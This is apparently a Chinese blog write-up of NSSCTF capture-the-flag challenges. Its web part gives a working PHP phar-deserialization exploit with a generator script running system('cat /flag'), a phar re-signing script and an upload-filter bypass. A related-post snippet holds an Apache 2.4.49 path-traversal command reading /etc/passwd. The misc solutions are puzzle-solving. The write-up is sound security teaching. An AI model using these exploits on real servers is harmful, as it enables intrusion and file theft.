NSSCTF部分复现

最新推荐文章于 2024-07-29 22:50:36 发布
最新推荐文章于 2024-07-29 22:50:36 发布
阅读量371 收藏
点赞数 1
分类专栏: WP 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63928796/article/details/126224375
版权

NSSCTF

WEB

ez_rce

看版本,百度一下有目录穿越漏洞

Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用_Tauil的博客-CSDN博客

构造payload

这里制造了一个文件夹迷宫,仅存在四层

1zweb(revenge)

一个文件上传的页面,可以查看文件

先查看一下基本的文件,index.php,uoload.php,等

index.php

<?php
  class LoveNss{
  public $ljt;
  public $dky;
  public $cmd;
  public function __construct(){
    $this->ljt="ljt";
    $this->dky="dky";
    phpinfo();
  }
  public function __destruct(){
    if($this->ljt==="Misc"&&$this->dky==="Re")
      eval($this->cmd);
  }
  public function __wakeup(){
    $this->ljt="Re";
    $this->dky="Misc";
  }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
  echo file_get_contents($file);
}
?>

file_get_contents读phar文件时能能触发返序列化漏洞,明显要让dky=“Re”,ljt=“Misc”,执行cmd的任意代码

pop

<?php
  unlink('phar.phar');
  class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
  }

  $a=new LoveNss();
  $a->cmd="system('cat /flag');";
  $a->ljt="Misc";
  $a->dky="Re";
  $phar = new Phar('phar.phar');
  $phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
  $phar->setMetadata($a);
  $phar->addFromString('1.txt','dky');
?>

运行得到一个phar文件,我们还要绕过wakeup函数,

改完之后要修改签名

from hashlib import sha1
f = open('../phar.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('22.phar', 'wb').write(newf) # 写入新文件

再看upload.php

<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}
?>

后缀必须是图片,且内容不能出现phar标志

可以压缩zip绕过

上传后用phar伪协议读取

MISC

Type Message

电话拨号

用九键拼出来是NSSCTF,后面三个音频都一样,拼起来就是flag

Knight’S Tour

拿到ChessBoard.zip压缩包,发现打不开,拖进010里看一看
好家伙,zip竟然是rar的头,直接修改头为504b0304 就可以正常解压解压后得到图片

观察分析,发现上面8x8的格子中正好对应下面的字母,应该是照顺序打乱了,结合题目Knight’s Tour,可以找到这样一个游戏根据游戏规则可以得到下面结果这里跟据第一列全为红色,每排有8个,只有两种颜色可以推测(脑洞)出红色代表0 黄色代表 1解出来为Ch1v@lry,即为flag

Msaerati
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LitCTF2023-部分Reserve复现
m0_73393932的博客
05-22 943
不同的python版本对应不同的magic, 时间戳是这个文件处理的时间信息,其中magic影响文件的反编译,如果pyc文件缺失magic或者magic损坏,就可能出现无法反编译情况。是换表没错了, 每次将v3的值作为下标在base64表中查找,查找到的值赋给base64密码表,重复64次,可以写一个脚本,解出新的base64密码表。可以看到程序先输入一串数据,然后在function函数中进行加密,加密后的数据与v6~v14进行比较,相等则输出,恭喜答对了,否则输出 不对哦。这种异常可能是除0错误。
2024年网络安全最全[SWPU CTF]之Misc篇(NSSCTF)刷题记录⑥_nssctfmisc
2401_84300128的博客
05-03 846
flagNSSCTF
[NSSCTF][SCTF 2021]WEB复现
cosmoslin的博客
03-09 1937
感谢NSSCTF提供复现环境 loginme middleware.go package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != "" { c.Abor
[蓝帽杯 2022 初赛]之Misc篇(NSSCTF)刷题记录(复现)
Aluxian_的博客
05-08 2444
[蓝帽杯 2022 初赛]全国大学生网络安全竞赛 电子取证复现
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
【Web】NSSCTF Round#18 Basic个人wp(部分)
uuzeray的博客
02-14 1644
不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可。我们就按示例传一下(必须以http://开头,否则不能解析为图片)尝试传了发现不能起作用跳转,估计是这些被html实体化了。链接是插入到了src中,我们可以直接用">闭合img标签。从评论区知道,要让门酱玩元梦之星,考虑直接。那咋整呢,题目里还提供了评论插入图片功能。把这个链接给门酱即可获得flag。成功重定向到元梦之星官网。先试一下随便给个链接。获得该条恶意评论链接。
Spring Core RCE 漏洞复现
qq_73630656的博客
06-12 563
远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件
nssctf round#4
weixin_63231007的博客
08-21 1200
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。怎么通过脚本直接修改这个phar文件里序列化好的数据来绕过wakeup这部分我不清楚,查看wp之后需要生成phar文件后,自己手动修改文件数据,用到脚本修改签名。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。
NSSCTF Round#8 Basic
v2ish1yan的博客
02-11 1541
根据出题人的本意是让我们上传一个包,然后去加载那个包,但是我是直接用的别人的exp,而且题目环境也包含exp里需要的文件,所以直接打就行。感觉部分源码和MyDoor是一样的,只是我尝试用伪协议读取index.php的时候没回显,所以猜测应该就是用了include来读取文件。发现可以执行命令,因为php的特性如果执行给N_S.S传参,那么N_S.S在后端会被规范成N_S_S。所以使用N[S.S来使后端得到的参数为N_S.S(具体原因自己去搜吧)之前的字符串的命令,并且是对你上传的文件进行执行的,(猜的)
HDCTF 2023 复现
weixin_63231007的博客
07-11 953
web yaml反序列化&quine注入&Apache SCXML2 RCE pwn 栈迁移&格式化字符串 crypto RSA
使用numpy复现贝叶斯网络
10-16
在这个主题中,我们将深入探讨如何使用Python的科学计算库NumPy来复现贝叶斯网络的基本概念和操作。NumPy是Python生态系统中的核心库,提供了高效的多维数组对象和各种数学函数,非常适合进行数值计算。 首先,我们...
论文复现-深度补全算法
03-10
1、传统深度不全算法复现 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、复现代码可直接运行、包含有测试用例、以及验证代码
numpy复现xgboost算法内含数据集
10-16
本主题将深入探讨如何使用基础的NumPy库来复现XGBoost算法的核心概念,这对于理解其工作原理和进行性能优化非常有帮助。 XGBoost全称为“Extreme Gradient Boosting”,它是在梯度提升框架下实现的一种集成学习方法...
meshCNN分割准确率复现 - 使用官方代码
08-27
使用MeshCNN官方代码复现了其分割准确率,除了在chairs上的分割准确率偏低,其余均与论文一致 (相差不大,有高有低,大致相同)。 checkpoints文件包含: 1. 四个分割数据集的准确率testacc_log.txt以及最终生成的...
这款ERP云进销存系统,直接封神
魔法标记
07-29 573
一套用php写的ERP云进销存系统,快速部署,直接使用,简直是小公司和个体户的神器。
WordPress原创插件:搜索引擎抓取首图seo图片
最新发布
爱酷码的博客
07-29 308
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 806
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
iTransformer复现
06-20
iTransformer是Transformer模型的一种改进或扩展,通常用于自然语言处理任务,如机器翻译、文本分类等。它可能包含了对自注意力机制、位置编码、模型结构(如更深层或更大的模型规模)等方面的优化或创新。复现iTransformer通常涉及以下几个步骤: 1. **理解原论文**: 首先,你需要详细了解iTransformer的原始论文,理解其设计原理和核心创新点。 2. **代码库选择**: 选择一个适合的深度学习框架(如PyTorch或TensorFlow),以及可能的预训练库(如Hugging Face的Transformers)来进行复现。 3. **代码实现**: 根据论文描述,实现iTransformer的各个组成部分,包括注意力模块、自适应层、残差连接等。 4. **数据准备**: 准备相关的数据集,并进行必要的预处理,如分词、编码和批量处理。 5. **模型训练**: 使用准备好的数据对模型进行训练,调整超参数以达到最佳性能。 6. **评估和验证**: 训练完成后,使用测试集进行性能评估,如计算准确率、F1分数等指标。 7. **结果分析**: 分析模型性能,如果有必要,对比原始论文的结果,看看是否有显著的提升或差异。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值